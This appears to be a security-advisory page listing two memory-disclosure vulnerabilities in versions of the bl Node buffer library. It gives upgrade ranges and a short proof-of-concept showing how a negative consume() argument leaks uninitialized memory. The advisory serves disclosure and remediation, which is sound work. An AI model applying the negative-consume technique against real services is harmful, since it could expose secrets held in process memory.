org.webjars.npm:bl@0.8.2 vulnerabilities

latest version

5.1.0

latest non vulnerable version

5.1.0

first published

9 years ago

latest version published

2 years ago

licenses detected

MIT
[0.8.2,)

package manager

View on Maven Repository

Go back to all versions of this package

Report a new vulnerability Found a mistake?

Direct Vulnerabilities

Known vulnerabilities in the org.webjars.npm:bl package. This does not include vulnerabilities belonging to this package’s dependencies.

How to fix?

Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

Fix for free

Vulnerability Vulnerable Version

Vulnerability	Vulnerable Version
H Remote Memory Exposure Affected versions of this package are vulnerable to Remote Memory Exposure. If user input ends up in `consume()` argument and can become negative, BufferList state can be corrupted, tricking it into exposing uninitialized memory via regular `.slice()` calls. PoC by chalker const { BufferList } = require('bl') const secret = require('crypto').randomBytes(256) for (let i = 0; i < 1e6; i++) { const clone = Buffer.from(secret) const bl = new BufferList() bl.append(Buffer.from('a')) bl.consume(-1024) const buf = bl.slice(1) if (buf.indexOf(clone) !== -1) { console.error(`Match (at ${i})`, buf) } } How to fix Remote Memory Exposure? Upgrade `org.webjars.npm:bl` to version 2.2.1, 3.0.1, 4.0.3, 1.2.3 or higher.	[2.2.0,2.2.1)[3.0.0,3.0.1)[4.0.0,4.0.3)[,1.2.3)
M Uninitialized Memory Exposure bl is a storage object for collections of Node Buffers. A possible memory disclosure vulnerability exists when a value of type `number` is provided to the `append()` method and results in concatenation of uninitialized memory to the buffer collection. This is a result of unobstructed use of the `Buffer` constructor, whose insecure default constructor increases the odds of memory leakage.	[,0.9.5)[1.0.0,1.0.1)

Remote Memory Exposure

Affected versions of this package are vulnerable to Remote Memory Exposure. If user input ends up in consume() argument and can become negative, BufferList state can be corrupted, tricking it into exposing uninitialized memory via regular .slice() calls.

PoC by chalker

const { BufferList } = require('bl')
const secret = require('crypto').randomBytes(256)
for (let i = 0; i < 1e6; i++) {
  const clone = Buffer.from(secret)
  const bl = new BufferList()
  bl.append(Buffer.from('a'))
  bl.consume(-1024)
  const buf = bl.slice(1)
  if (buf.indexOf(clone) !== -1) {
    console.error(`Match (at ${i})`, buf)
  }
}

How to fix Remote Memory Exposure?

Upgrade org.webjars.npm:bl to version 2.2.1, 3.0.1, 4.0.3, 1.2.3 or higher.

[2.2.0,2.2.1)[3.0.0,3.0.1)[4.0.0,4.0.3)[,1.2.3)

Uninitialized Memory Exposure

bl is a storage object for collections of Node Buffers.

A possible memory disclosure vulnerability exists when a value of type number is provided to the append() method and results in concatenation of uninitialized memory to the buffer collection.

This is a result of unobstructed use of the Buffer constructor, whose insecure default constructor increases the odds of memory leakage.

[,0.9.5)[1.0.0,1.0.1)

Go back to all versions of this package